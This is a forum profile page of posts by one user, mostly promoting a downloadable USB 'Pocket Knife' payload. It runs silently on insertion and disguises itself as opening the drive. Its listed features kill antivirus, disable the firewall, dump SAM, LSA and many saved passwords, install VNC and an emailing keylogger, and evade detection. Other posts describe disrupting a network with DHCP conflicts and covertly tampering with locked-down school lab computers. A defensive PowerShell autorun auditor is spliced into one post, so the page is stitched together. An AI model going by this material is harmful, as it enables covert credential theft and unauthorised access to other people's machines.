Leapo

Everything posted by Leapo

  1. Reserved for future use by OP due to character limits...
  2. Download Payload: Here's where you'll find the most recent full build of my payload; I'll try to keep this as up-to-date as I can as I receive and work out fixes and optimizations. I'll always post a notification when a new version is available, or when an update is made to the code in my above posts.

     Current Version: USB Pocket Knife 0.8.8.0 by Leapo
     Release Date: October 6, 2008
     Download Mirrors: MegaUpload, and RapidShare
     Note: The above includes both the U3 and non-U3 versions of the payload. The ISO is now pre-built, just flash and go!!!

     Payload Change Log:

     October 6, 2008: Pocketknife 0.8.8.0 Released
     - Change 0: Payload can now be set to shut down the PC after it's finished.
     - Change 1: Now dumps Google Chrome passwords.
     - Change 2: New profile management system, save up to 3 payload configurations!
     - Change 3: If "Safety.txt Check" is disabled, Menu.bat will now show the "run payload" option even if Safety.txt is found.
     - Change 4: Made some cosmetic fixes to Menu.bat.

     September 28, 2008: Pocketknife 0.8.7.0 Released
     - Change 0: Backup Script in menu.bat works again.
     - Change 1: Auto-Update script in menu.bat works again.
     - Change 2: Many path errors fixed.
     - Change 3: Added OS detection to increase compatibility.
     - Change 4: Slurp now uses variables instead of hard paths to improve compatibility.
     - Change 5: Slurp now grabs data from Pidgin.
     - Change 6: Prebuilt U3 ISO included!

     September 19, 2008: Pocketknife 0.8.6.5 Released
     - Change 0: Invalid directory name broke just about all of 0.8.6.0; this has been corrected.
     - Change 1: AVKill's executable was missing from the U3 version of the payload.
     - Change 2: File Copier's executable was missing entirely.

     September 15, 2008: Pocketknife 0.8.6.0 Released
     - Change 0: Fixed U3 compatibility (was broken in 0.8.5.5).
     - Change 1: Slurp 2 should now work properly.

     September 17, 2008: Pocketknife 0.8.5.5 Released
     - Change 0: Fixed "Port Scan" not running correctly.
     - Change 1: PwDump failing to create service.
     - Change 2: FgDump failing to output anything.
     - Change 3: Firepassword updated, now works with Firefox 3.0.
     - Change 4: PwDump updated to 1.7.2.
     - Change 5: FgDump updated to 2.1.0.

     September 14, 2008: Pocketknife 0.8.5.0 Released
     - Change 0: Animation_1.cfg was missing, causing some features of menu.bat to malfunction.
     - Change 1: Fixed an ordering issue in Start.bat.
     - Change 2: Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat.
     - Change 3: Fixed a typo preventing the "Dump Mail Passwords" module from running.
     - Change 4: Fixed a typo preventing the "Dump Updates-List" module from running.
     - Change 5: Fixed "Dump Mail Passwords" not running correctly.
     - Change 6: Fixed "Dump Network Passwords" not running correctly.
     - Change 7: Fixed "Dump Messenger Passwords" not running correctly.
     - Change 8: Fixed "Dump LSA Secrets" not running correctly.
     - Change 9: AVKill should now operate silently.
     - Change 10: File structure created by Slurp was cleaned up.
     - Change 11: Folder now opens AFTER the payload finishes, not before (if it's selected to open at all).

     September 11, 2008: Pocketknife 0.8.2.0 Released
     - Change 0: Bug causing Safety.txt to be ignored fixed.
     - Change 1: "No Disk" errors should be resolved.
     - Change 2: New "disarm" feature to prevent it from starting at all.
     - Change 3: Three options on what folder to open after completion: Logs, Root, or None.
     - Change 4: ReadMe brought up to date.
     - Change 5: "Disable Firewall" is now totally silent (disables Security Center first).

     August 31, 2008: Pre-Release 0.8.1.0 Released
     - Change 0: Now fully U3 compatible (fixed from v0.8.0.0).
     - Change 1: Menu.bat has been greatly reduced in size.

     June 09, 2008: Pre-Release 0.8.0.0 Released
     - Change 0: Payload overhauled from the ground up.
     - Change 1: Now fully U3 compatible (broken in this build).
     - Change 2: Menu system overhauled.
     - Change 3: Both versions of the payload launch silently for sure!

     November 24, 2007: U3 ISO
     - Change 0: Fixed the U3 ISO to launch the payload silently.

     November 10, 2007: Beta 0.6.2.1 Release
     - Change 0: VNC install method updated.
     - Change 1: Backup and Restore Script streamlined.
     - Change 2: Automatic Updates added.
     - Change 3: Centralized Management Interface added.

     June 20, 2007: Beta 0.4 Release
     - Change 0: Added a custom backup and restore script (restores the payload before every run to keep it safe from AV software).
     - Change 1: Updated the Readme with new information about the backup and restore function. PLEASE READ THE README!
     - Change 2: Improved and added more comments to the code.
     - Change 3: Fixed various typos in my comments.

     June 18, 2007: Beta 0.3 Release
     - Change 0: Completely overhauled Slurp and Slurp2.bat.
     - Change 1: Fixed Port_Scan.bat (thanks go to Elmer and GonZor for their help).
     - Change 2: Improved and added more comments to the code.
     - Change 3: Fixed various typos in my comments.

     June 16, 2007: Initial Post
     - Change 0: Initial Release.
  3. Known Bugs: Keylogger is currently non-functional Payload may cause No Disk errors on systems with card readers (will be fixed in next version)
  4. Modules In Development: Please Stand By
  5. Introduction: Let me start off by saying that this is NOT YET a final payload; this thread's purpose is to serve as a learning experience to me while providing a useful end-all be-all payload to the community. For now I will provide the payload in its current state at the end of this post. This payload is the result of slowly browsing this forum and saving every bit of code and every full payload I've come across, then stitching it all together into a modular switchblade with just about every feature in existence. I've gone through and fully commented most of the code (still working on that), I've made sure everything is virus free, I've separated out major functions so that they can be turned on and off at will, and I've made sure it runs completely silently on a U3 and non-U3 thumbdrive in the least-obvious way possible.

     Current State and Features: The following is a list of everything included in the payload:

     Key: - Non-U3 Drives Only - U3 Drives only - Not yet Implemented - Everything Else

     Features:
     - Upon insertion, the first option in the Autorun dialog box starts the payload, while appearing only to open the drive.
     - Full silent autorun with no user interaction for U3 drives.
     - A "Menu.bat" is included to manage all special functions, modules, and features of the switchblade.
     - Payload checks the root of the C: drive and prevents the payload from running if the file "Safety.txt" is found.
     - Includes TightVNC viewer so you always have it with you.
     - Includes Notepad++ for easy batch editing.
     - Includes antidote batch files for Nmap, the Hacksaw, and VNC.
     - Fully commented code and fully featured ReadMe with instructions on setting up the payload for your needs.
     - A custom backup and restore script, which automatically restores the switchblade (to the last time it was backed up) before every run. This ensures the payload is always put back to a normal state, even after it's been nuked by an antivirus.
     - A custom auto-update script that goes out and downloads the most recent versions of many of the tools used on the switchblade (pwdump, nircmd, etc). Simply run it from Menu.bat, and the tools will be downloaded, extracted, and installed into the payload. The backup archive for the entire payload will also be updated to keep the latest versions of the files from being overwritten by an old backup. *Working on a way to get this working for U3 drives.
     - Auto-compress logs as they are generated to save space.
     - Email logs back to yourself.
     - Optional auto-repack of executable to circumvent AV detection.

     Payload Components:
     - Runs AVKill (csrss.exe)
     - Restores the payload to the last backup point
     - Disables the Windows Firewall silently
     - Hides Hidden and System Files
     - Enables the Remote Desktop service
     - Dumps general System Info
     - Dumps the SAM
     - Dumps LSA secrets
     - Dumps LSA secrets via an alternate method (less detectable, not as pretty)
     - Dumps Network Passwords
     - Dumps messenger passwords
     - Dumps IE passwords
     - Dumps saved wireless keys
     - Dumps URL history
     - Dumps Firefox passwords (supports Firefox 3)
     - Dumps Cache Passwords
     - Dumps Current Network Services
     - Generic Port Scanning
     - Dumps current external IP
     - Dumps email, messenger, and general website passwords
     - Dumps currently installed hot fixes and IE history
     - Dumps Google Chrome passwords
     - Installs Hacksaw the usual way
     - Installs WinVNC client
     - Installs Nmap as a service (emails you results like the Hacksaw)
     - Installs a keylogger which emails its logs off to you daily [broken!]
     - File slurping for logs, chat logs, downloads, bookmarks, etc. (smaller files)
     - File slurping for various Documents and Media folders (larger files)
     - Opens an explorer window to the Documents folder when finished
     - Automatic update script to keep various executables up to date
     - Compresses logs as they are generated to save space
     - Optionally emails logs in addition to storing them on the switchblade
     - Management interface to manage the various functions of the Pocket Knife
     - Ability to save up to 3 configuration profiles [New!]
  6. Hehe, that will cause some serious havoc. If you don't want to haul in a full blown PC, you can simply plug a cheap Linksys router or access point into the network and watch the admins scramble around as the DHCP conflicts start rolling in because the Linksys box is remapping everything on the network.
  7. Microsoft chose the wrong time to add this functionality to Windows, that's for sure. Turns out, Windows Vista now actively searches newly inserted removable media (like USB flash drives) for an autorun.ini to execute. Kinda surprised me when Pstart came up all by itself when I plugged in my clean (non-switchblade) flash drive. Yeah, it's kinda useless until someone builds a more Vista compatible switchblade, but it does open up some new doors for those of us who don't have U3 flash drives.
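The two behaviours these posts rely on, a removable drive whose autorun.inf launches the payload while appearing only to open the drive (post 5) and Windows executing that autorun.inf automatically on insertion (post 7), are exactly what a defender checks for. The script below is an added example and is not code from the Pocket Knife payload or from the original posts: it parses the [autorun] section of an autorun.inf for the keys that cause code execution (open, shellexecute and shell\<verb>\command), reads the standard NoDriveTypeAutoRun policy value (0xFF disables AutoRun for every drive type; the HKLM policy key takes precedence over HKCU), and drops the C:\Safety.txt marker that post 5 says makes the payload refuse to run. The autorun.inf text in $sampleInf is constructed for the demonstration and is not the payload's actual file.

```powershell
# Added example (not part of the original posts): audit removable drives for
# autorun.inf launchers, report the AutoRun policy, and place the Safety.txt
# kill-switch marker the Pocket Knife payload honours.

function Get-AutorunLaunchers {
    param([Parameter(Mandatory)][string]$InfText)
    # Only the [autorun] section matters; section and key names are case-insensitive.
    $inSection = $false
    $found = @()
    foreach ($line in $InfText -split "`r?`n") {
        $t = $line.Trim()
        if ($t -match '^\[(.+)\]$') { $inSection = ($Matches[1] -ieq 'autorun'); continue }
        if (-not $inSection -or $t -eq '' -or $t.StartsWith(';')) { continue }
        if ($t -match '^(?<key>[^=]+?)\s*=\s*(?<val>.*)$') {
            $key = $Matches['key'].Trim()
            # open= and shellexecute= run a program directly; shell\<verb>\command=
            # attaches a program to a context-menu verb (e.g. the default "Open").
            if ($key -imatch '^(open|shellexecute)$' -or $key -imatch '^shell\\[^\\]+\\command$') {
                $found += [pscustomobject]@{ Key = $key; Command = $Matches['val'].Trim() }
            }
        }
    }
    return $found
}

function Get-AutorunPolicy {
    # NoDriveTypeAutoRun is a bitmask of drive types with AutoRun disabled;
    # 0xFF covers all of them. A machine policy (HKLM) overrides a user one (HKCU).
    foreach ($hive in 'HKLM', 'HKCU') {
        $p = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
        $v = (Get-ItemProperty -Path $p -Name NoDriveTypeAutoRun -ErrorAction SilentlyContinue).NoDriveTypeAutoRun
        if ($null -ne $v) {
            return [pscustomobject]@{ Hive = $hive; Value = $v; AllDisabled = (($v -band 0xFF) -eq 0xFF) }
        }
    }
    return [pscustomobject]@{ Hive = 'none'; Value = $null; AllDisabled = $false }
}

# Constructed sample (not the payload's real autorun.inf) to show what the parser flags.
$sampleInf = @"
[autorun]
; "action" and "icon" make the launcher look like a plain "open folder" entry
open=launcher.exe
icon=drive.ico
action=Open folder to view files
shell\open\command=launcher.exe
"@
Write-Host "Sample autorun.inf launchers:"
Get-AutorunLaunchers -InfText $sampleInf | Format-Table -AutoSize

# Walk the removable drives actually plugged in (DriveType 2) and flag live launchers.
foreach ($vol in Get-CimInstance Win32_LogicalDisk -Filter 'DriveType = 2') {
    $inf = Join-Path $vol.DeviceID 'autorun.inf'
    if (Test-Path $inf) {
        foreach ($l in (Get-AutorunLaunchers -InfText (Get-Content -Raw $inf))) {
            Write-Warning ("{0} autorun.inf: {1}={2}" -f $vol.DeviceID, $l.Key, $l.Command)
        }
    }
}

$policy = Get-AutorunPolicy
Write-Host ("AutoRun policy: {0} NoDriveTypeAutoRun={1} (all drive types disabled: {2})" -f `
    $policy.Hive, $policy.Value, $policy.AllDisabled)

# The payload checks the root of C: and refuses to run if Safety.txt exists there.
if (-not (Test-Path 'C:\Safety.txt')) {
    New-Item -Path 'C:\Safety.txt' -ItemType File | Out-Null
    Write-Host 'Created C:\Safety.txt'
}
```

Run it from an elevated PowerShell prompt; writing to the root of C: and reading the HKLM policy key both need it. The Safety.txt marker only stops payloads that implement this particular check, so treat the NoDriveTypeAutoRun policy as the real control and the marker as a bonus.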
  8. Any way to keep these files from getting wiped out by AV software on a non-U3 drive? I've modded one of my USB Switchblades to dump all its log files to "C:\Documents and Settings\%currentuser%\Desktop\Logfiles" so that I can put the entire flash drive in read-only mode, but then I have to remove the switchblade and plug in a clean drive so I can take the dumped logs with me. It works, but I find that it's rather suspicious to be swapping flash drives in and out. Anybody know of a better way?
  9. Has he tried downloading via proxy with something like Ultra Surf? If it works, it would probably be faster than sending the episodes to him over IM...
  10. Pick up a cheap USB flash drive and put Portable Firefox on it ;) Firefox has the potential to get around all sorts of restrictions; downloading files, browsing hidden places, getting around web filters...I'm sure you'll find more.
  11. You might also consider having the hacksaw generate rar files with "%computername%.rar" as the name, that should make it far easier to figure out what is coming from where.
  12. Don't know what to tell you, my original code appears to work just fine on every system I've tried it on...
  13. This should open the root of the drive (you'll need to make sure you have nircmd.exe in your X:\WIP\CMD folder):

      @echo off
      REM Open the drive root: two directory levels up from X:\WIP\CMD, where this batch file lives
      start ..\..\
      REM Maximize the Explorer window whose title contains "Removeable"
      nircmd.exe win max ititle "Removeable"
  14. Leapo

    Accessing C:\

    The admins at my high school were the same way; they locked those computers down so tight that usability started becoming an issue. The only drives they didn't block access to were a network hard disk and the CD-ROM drive; they removed the File, Edit, and Tools menus from Explorer and IE, disabled downloading in IE, severely limited what programs were available from the Start menu, and even went as far as to disable right-clicking. . . oh, and for some reason they were using Deep Freeze ON TOP of all this garbage. . . At first glance, yeah, it looked like air-tight security. . . but upon further inspection there were a few rather large holes that could be used to open the systems up completely. Depending on how much you wanted to do, there were lots of things that could be done to get around the "security measures" that they had instated. I found out how to get around a few small annoyances (Firefox on a flash drive, for instance, did not share the restrictions on downloading that IE did), but I wanted total control on some of these machines, which meant finding a way around Deep Freeze and the restrictions imposed by group policies. There was one hole in particular that made the following possible with relative ease: although the BIOS was locked out, the Bootable Media Selection screen wasn't, allowing me to boot from a CD or flash drive. Enter a handy tool called GParted (a Linux-based hard disk management tool that runs off of a live CD): I simply booted into GParted, shrunk the existing (frozen) Windows partition, and made a new partition in the free space created by shrinking the frozen partition. Upon booting into Windows I had 30GB of unrestricted local storage, which was nice, although I was still restricted in what I could install on it because of the restrictions of the machine (tried to install iTunes on the new 30GB partition and got slapped with a box asking for administrator access).

    At this point I had a radical idea: "Hmm, I can create a completely unrestricted 30GB partition on any of the computers here within a matter of minutes; why don't I just install my own OS and get around all this crap?" Well, there were a few problems with this. First, the current boot loader was on the frozen partition. Second, I didn't want an OS selection screen to pop up, because the local administrators would know that the machine had been tampered with. Keeping these things in mind, I dug out a spare Windows 2000 disk and installed it on the new 30GB partition (at this time, all the computers in the lab were running Windows 2000). Now obviously, I couldn't boot to my new install of Windows because the boot loader didn't know it was there (it was reverted by Deep Freeze), but I was going to use this to my advantage. At this point I had my Windows install on one partition, and the stock Windows install in Deep Freeze on the other with a boot loader that didn't know my Windows install existed (it didn't create a dual-boot configuration because the boot loader on C: had been reverted, so the other Windows install was just sort of sitting there). To boot my install of Windows, I set up a bootable CD with a boot loader that pointed to my Windows install on the 30GB partition; when I wanted to boot into my unrestricted install of Windows, all I had to do was pop in my "special" CD, hit F12 to get the bootable media selection screen, select the CD-ROM drive, and let the machine start up! The best part was, unless you popped in the CD there was no way to boot into my Windows install, and you couldn't tell that the system had been altered in any way! I think I set up 4 of the PCs in our computer lab like that.

    It was a lot of hassle to get set up (although a Ghost image of each partition would speed up the process greatly), and after that point, I almost never ran into a situation where all 4 of my altered PCs had been taken at once, as the lab was never all that busy. . . Anyhow, just food for thought. The computer lab at my high school was completely unsupervised because the computers were considered to be so locked down that they figured nothing could really happen (especially with the over-active web filter, which took a little more work to deal with). At most other schools you probably won't have 3+ hours all to yourself in a computer lab without someone tapping you on the shoulder and asking you what you're doing.